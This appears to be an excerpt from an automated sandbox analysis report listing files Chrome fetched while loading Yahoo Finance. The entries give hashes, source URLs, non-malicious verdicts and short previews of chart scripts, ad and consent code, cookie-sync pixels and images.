                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import l from"./webpack-assets-prod.DkcX54ri.js";const E="yf-quote-chart-settings",m="1d-qsp",H="1d-sm",R=480,X={line:"Line",candle:"Candle",mountain_baseline_delta:"Baseline",mountain:"Mountain",bar:"Bar"};function v(){const t={extendedHoursEnabled:!0,tooltipEnabled:!0};try{const e=window.localStorage.getItem(E);return e===null?t:JSON.parse(e)}catch{}return t}function U(){const t=v();try{window.localStorage.setItem(E,JSON.stringify(t))}catch{}return t}function k(t,e){return["EQUITY","ETF"].indexOf(t.toUpperCase())>-1&&["ASE","NAS","NXX","NMS","NYQ","NYS","PCX","NCM","NGM","BTS"].indexOf(e.toUpperCase())>-1}function O(t,e){switch(t){case"tooltipEnabled":window.finQuoteChart.stx.layout.headsUp={floating:e};break;case"extendedHoursEnabled":window.finQuoteChart.setExtendedHours(e);break}}function b(t){return t<=R}function q(t){const e=b(window.finQuoteChart.stx.chart.canvasWidth);return["MUTUALFUND","CUL_IDX","CUL_SUB_IDX"].indexOf(t)>-1?e?"1m-sm":"1m":e?H:m}function M(t){const e=b(window
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64662)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):103415
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.333954900515722
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:5wQndm/xVe8DyLfcqYN8SFSJ7DAggrOTUEH:5HdGhGLKFGp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E1FCDBADCA0544111B9BFE5BA59C3086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A98B55B20E8FE4B8C27A74A2C37BFDC5C5EC93E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:974489C9DE5D32D3F539F2D6B70E9B2E1F6AE40B618254C533C8BB087A9B1707
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F09382845B5C5C325DC57D3D13A302BB54F4C53C5DD34F819476C1D505DC21FBCD98E39C270A2F33E7E54CDAE670C241213363BE1A1CBEAC8D01445A82EC5B46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/du/ay/wnsrvbjmeprtfrnfx.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.assertive = {. entityId: "wnsrvBJmEPrTfrnFX",. analytics: {. sampleRate: 0.05,. integrations: {. ivt: false,. },. logUnfilled: true,. useHistoryChangeTrigger: true,. override: {. normalizeSlotId: function (slotId) {. return slotId.replace(. /-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/,. "". );. },. },. },. floor: {. enabled: true,. addToHashKey: false,. currency: "USD",. optimizeThreshold: 'm_0.2',. optimizePrebidThreshold: '1st_1.4',. exploreRate: 0.05,. limit: {. percentage: 0.95,. },. prebid: true,. aps: false,. priceBuckets: [. { min: 0, max: 2, increment: 0.01 },. { min: 2, max: 3, increment: 0.05 },. ],. },.};../**. * Assertive Yield. * v2.33.4. *. * . 2018-2024 Assertive Yield B.V. All Rights Reserved.. */.!function(){function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65484)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):184464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.449610683212188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:CmzNNlFchunXBo4P5/vurL73G8HbREzC1H9RrMrjbJPySO+/U+wSS60ibrLr2pmx:CmzNNlFchunXBhPh90iWglWO/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6863CE0703CE4F482389F8A7E640E4E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7554A71C742AD65ADA09C7819E853F2F71D88D52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D08DEDFB38AA5AE7DEDADCAE8425F632C17CE61ABA51990D9275FB71A2B28387
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:36FA691795A4125FC052D4A75FEAB5B83059676B66C8D927E28EE56AC66B0BFA73021CB26C66953E49C3BDE0D41005D67D6F15D26AD8DA6140C5153EB9488390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://consent.cmp.oath.com/version/6.4.1/cmp.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! CMP 6.4.1 Copyright 2018 Oath Holdings, Inc. */.!function(){var e={4184:function(e){"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],i=window,o=i;o;){try{if(o.frames.__tcfapiLocator){e=o;break}}catch(e){}if(o===i.top)break;o=o.parent}e||(function e(){var t=i.document,n=!!i.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),i.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),i=0;i<e;i++)t[i]=arguments[i];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplies:n,c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (20717)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):20719
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.563835546790689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:g1Ij/LcZpnh3eIAT4yfZvjZwEOXI4dMODMfr38ebmAjDRh2DC16GmPn:g1aA/h3eIu4yfxjWE4I4dMODMfr38ebQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F005A5FDF9637F500D28CD8B91363045
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9DFE48A2BD40A6AAF5D440F507D749654E1E355D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:89EF14460564B303F7F56369F7F0EDF39734C7D447CB4A76328474CB4F286ABE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DCD50FBDC6774937AFD148FFB1F6D2077A33667DD3DB7F884D2A8D0BC6F994F132FD3CE0D4D23DA4A6D16182EA257883841571A70E0FE3D696C16BEE04359164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/AdvancedChartLink.kjUuQkM-.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,e as W,b as G,d as Q,f as ne,j as B,i as E,q as h,k as d,l as ae,y as Me,t as K,h as z,m as Oe,G as Te,v as ke,n as re,p as U,x as ye,L as _e}from"./scheduler.Dsuh-FKt.js";import{S as se,i as oe,t as _,g as Z,a as g,e as J,c as b,b as P,m as k,d as y}from"./index.CvwOawEI.js";import{I as Ye,i as we,s as Ue}from"./chartUtil.-voOXoQ6.js";import{t as A,g as w,s as ve,m as Ve,a6 as Ee}from"./commonUtil.BWwawKjd.js";import{B as le}from"./Button.C2rixdaC.js";import{C as He}from"./calendar_today.FjAU0N44.js";import{T as Fe}from"./Tabs.6aO2IOBS.js";import{e as he}from"./each.CI2tb2RB.js";import{S as Ge,O as Be}from"./Select.DMUNtRO-.js";import{I as qe}from"./Icon.C8w5V9EK.js";import{L as We}from"./Link.vSNQugO0.js";import{E as Qe}from"./open_in_full.BywbHFZf.js";const Ke="Add Symbol",ze="Are you sure you want to remove",$e="Bearish",je="Bullish",Xe="Change",Ze="% Change",Je="Close price",xe=". {{year}} Yahoo. All rights reserved.In partnership with ChartIQ",et="Confirm Delete",t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):20728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.959388942661401
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:EvF/BcP3ntN1E6zxO0FioBRiIw22NDSOtMfJ40BVIL6z8:r71G4io+2I/MfJ48BQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:52F7113BD1CE41408818A9CC863D1E31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:52835A836EE106C4469B3830C7302FDEE2461412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E0E622DC484CF6FD2EEC33BBCFE42205CD020C76FC11561CF019394705B5A09B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:838ED4CF86AC85BCF2C2F93A5E4DEEC7E1579F4D3FAD44120DC8837B3F3FF815B7EBBEAA24DCF0AFC0F230F5C691091AD48A86F4A4A0EE113A47ABF22DCD0570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C.........................................................................,............................................S............................!1"AQa...#2q..Bb....$3Rr...C.....%45S.....DHce.......................................8........................!...1."#A23BQ.aq.$4R.....Cbr..............?......M.{eI.q.Q.....-H.p.M..z.....N....Fq..4....u...g.i2.#.@..?.i....#.#.....$.dt..t g~^4..CF..q..J?.....#...........u.m@qJ>.'....*x.....5.D.9.PjB..%.'!M.;II...H8.#.}.Y........a....%...........\b*..V.y.;"`.8...G.e.n.O.R.>.?TBP...+...{j.h.A.[2*...wV.R...k.Ji..)....N86.j..3....$....~..mJ._..Q&71U.Q".p.ZL.aY.Np..N............T.....2.v..lPjHB..m....+r.g......`..9.....o..R....u..s}8....Q...#..iF.@.@.@.@.@.@.@.@.@.@.@.@.@..m..3.d..:..k.E.mAr.p. ....!.....N...3.0+....m..5..b.u.Rc...$.N.{~.C..5..*C2...r.*.h.....K........(.F....q..T.'H._5C3..e.j..>...^/%K.).).Tp.X.9....O..O
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (324)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.712604020443725
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:AlvKmWWNSM3tmIj/WM4R1XzW+TPe5kASTmZvMRbe4hXBWUV2HiNlv:ARSki/1C+T7ASUSeDUVq+1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:87BE50D095B667E85C7A7C16928CE749
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:719F9E2B34C1BBF9F2E6172BFB731677988181F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:17DE704AC449FB082695A05404C1B45105FF8C73590B500D2995F8364F13E167
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:89903265FB51504B7D534CAF87D0EFAFEDB9B5C0BA6A7F8216EF88CDEA100644D0A8D35A585FC9A40517F1F3C2981AD15AB062EC539736A75D77BFA3E19AD992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/resizeUtil.BFOdtaWL.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function s(){const e=window._nimbus.resizeObserver;return e||(window._nimbus.resizeObserver=new ResizeObserver(n=>{for(const r of n)r.target.dispatchEvent(new CustomEvent("resize",{detail:{entry:r,observer:window._nimbus.resizeObserver}}))}))}function i(e){return s().observe(e),{destroy(){s().unobserve(e)}}}export{i as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1654), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.556175402880624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjkiUusyuqjuasedCKAHVGEq:N7pIfEjuafdCbIEq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C1E6CBEA76E135E9002F62520FEF85D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:82339A9C4E3662688D94F91CB36613E58F3F4D25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A6E2F96B8C4E4C9FFB8644F28A132F8B3133070CD73971D71C902C2BDDAB5947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F02F6D7BA0DBD011590D1F4DB5AF062BC34C7B02CF0061228F860B1F01FC8F7A831D8637C5468ED0302FD2AB4807AB3DDABCAEB0A9BC76094EEBB441401A9B56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=37182981&p=137711&s=137812&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28550)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.397776218743594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:PkT7bExg9VH7pnrmEmOW3/zqWoir6b/PFyiUJPQ1NMhWduU:PIbEoVbpnr43kGGt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2167B336605AA2B716F504F10A18CDD3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3BEA63BC7FE6830A00CAB81EDD279D96201DFE0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:930F0B2150C5510213B6E833332D31C87F079A7927AA0C697BA46F9AC3212F23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:52D41A9E922CB5CAC10C1D81C8CBE2A9C2CF5933A2EC53C714C2F2489E5BB8A16561F5B78DD28E3B47813C0122F1A937CB01F26152213225E543AF1CD9538947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see vendors-49d0a293.d7030417edc281a37393.js.LICENSE.txt */.(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[3729],{4745:r=>{var _;(_=void 0===_?{}:_)["arrow-filled-circle"]={name:"arrow-filled-circle",height:24,width:24,path:"M12 21c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zM8.265 9.783c-.374.38-.35.972.057 1.32.405.35 1.038.327 1.413-.052L11 9.77V17c-.01.26.082.526.295.725.39.366 1.022.367 1.412.003.213-.2.305-.466.284-.728L13 9.77l1.265 1.28c.376.38 1.008.404 1.413.054.406-.35.432-.94.057-1.32L12 6 8.265 9.783z"},r.exports&&(r.exports=_["arrow-filled-circle"])},4193:r=>{var _;(_=void 0===_?{}:_)["arrow-left"]={name:"arrow-left",height:48,width:48,path:"M18.857 34.593c.772.792 2.037.808 2.828.04.792-.772.81-2.038.04-2.83l-5.526-5.678h23.59v-4H16.2l5.524-5.68c.77-.79.753-2.058-.04-2.827-.388-.378-.89-.566-1.394-.566-.52 0-1.042.202-1.434.605L8.676 24.13l10.18 10.463z"},r.exports&&(r.exports=_["arrow-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4658)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4659
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.415130332872759
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:r1kWCJrJA3r6Tzvh+BFanLS+gE6MaxXBeDPsB7OKh7bewzWGead/SG7:r1kWCJr4FqLHMXBeQFh3eOeUl7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7E754DA991087422B419185F7126BD1C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C370FBE582EE2B62CAFBDB7CF0CD2EC6BC2E0453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A8DC529C95C5762D5AB6674C6190BC26EA5ACC0F02B07CECD1CEBFC4F601D10D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:393B7FABF78E48253BBC37A72CDA67A251A9EF0B2ED5DFD073CA0E0D5A1363C07EB5F784646B87D5FCCBBABC662D899AAD5B554D4421B35066E851CE77205ACA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as H,p as L,k as v,n as N,i as b,A as J,e as S,t as C,d as w,f as T,h as V,q as A,B as E,l as k,m as p,K as g}from"./scheduler.Dsuh-FKt.js";import{g as O}from"./spread.CgU5AtxT.js";import{S as I,i as R,c as Q,b as W,m as X,t as Y,a as Z,d as x}from"./index.CvwOawEI.js";import{o as z,q as B,N as $}from"./commonUtil.BWwawKjd.js";import{T as ee}from"./Ticker.Cv4N1gRS.js";function te(a){const e=a.slice(),t=e[4]||{};return e[10]=t.fmt!==void 0?t.fmt:"-",e[11]=t.raw!==void 0?t.raw:"-",e}function D(a){let e,t,s=z(a[11])+"",l,i=a[10]+"",o,n,c,d,m,f=[{"data-test":"colorChange"},{"data-symbol":a[3]},{"data-field":c=a[1].id},{"data-trend":"txt"},{"data-pricehint":d=a[0].original.priceHint||2},{"data-value":m=a[11]},{"data-tstyle":"default"},a[2]?{active:""}:{}],_={};for(let r=0;r<f.length;r+=1)_=J(_,f[r]);return{c(){e=S("fin-streamer"),t=S("span"),l=C(s),o=C(i),this.h()},l(r){e=w(r,"FIN-STREAMER",{"data-test":!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-pricehint":!0,"data-v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 356x180, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8870
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.982718021128449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:7UfdLi79VKVEgsN3GVg5z5ZIJ7Tsa0fOvwrJaMrfUeDL9e/:7UfcmgG+5YJlYOYNhfU+9e/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC5D683F7579B245520DE6F372EF6DD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6A2BC485E746497AF1090120A761BDFB791A7827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5FA8E60C9E644CA4BC0C4E6B10873B9E3483858127DCE918BB0ECCC09B54C0BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFED3E7DE2BD3376862009232F47C7CE8D42278F1AFC3F98B642E97E29CC49688E4DF85F5DE7601755E4ECEF0FF2E6E9B2988A080455E0DD0BBFAA93D1EB0FFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/PfuFkSI.w9qemWReAv.2kA--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a0026210-7f1b-11ef-92ab-b839323afb9a.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF."..WEBPVP8 ."..P....*d...>y4.F.."!,..`...g..&_.....JKTJ..o...K..{....E....?.4.}S.3./...?..E.h'.m?e4.d.....Y.m.O..#....b...!S..AO.P~.....L.a...u.]v.{Q.;.m...!J.a.1...%..?.F..?.:.A....?.-.._.6....d...Z/zs..3..)v..-.[A.#5M..sY.......0k..X#.......J....you/.....Md.6..X......Sg.IQMV ...2&hb.E|XWC.+.....Bl.2^...Q.L..S..84..%*sD..w..Z.......Q2..!........x......[.~t...|`.E}e.Q. ..=...*..I....wn.`0U......K.j5...)...*$.V..l....'.<.....y.E\.....0B.s:.tB.V..[..1n.p.....t..L._.c.?.ZV,.. \..Q.'....t.<....n.....?qb..R..?../..J$...W....N.*o....b....Dsj.f..x?iLp@.f.P..Vv.T.....$.4...A.n.~.#...E...O.`..i.6...M.*3...V0..n..:.,.........-...8.[.!...`W.?......<..U.6+.RZ....aC.t@.p...\.J...7.73.J.......GG.....W...#u...T......(..N...A].w....p..l{Y.P.:r.=S.'...u...).}.[|#...(..,...'...?.....?S.......,u..Zm;...v.a.. .Ne..G.y....-.....b...g..Dg..-.w....u..?.y........L.Z~L..yK.....r...x."...V..0.....................of....a.W?.....=n../.%.k.$JyC.!./....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.799690657316136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:SNYNMtKwi+vSWl6K0wLKb/uceSY3jCga/7jF7gZuhRQ50x:aYNg7HcKP+bcj3jCga/7jF0QYw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:68C893D06B6A2E5A640C539407A6E996
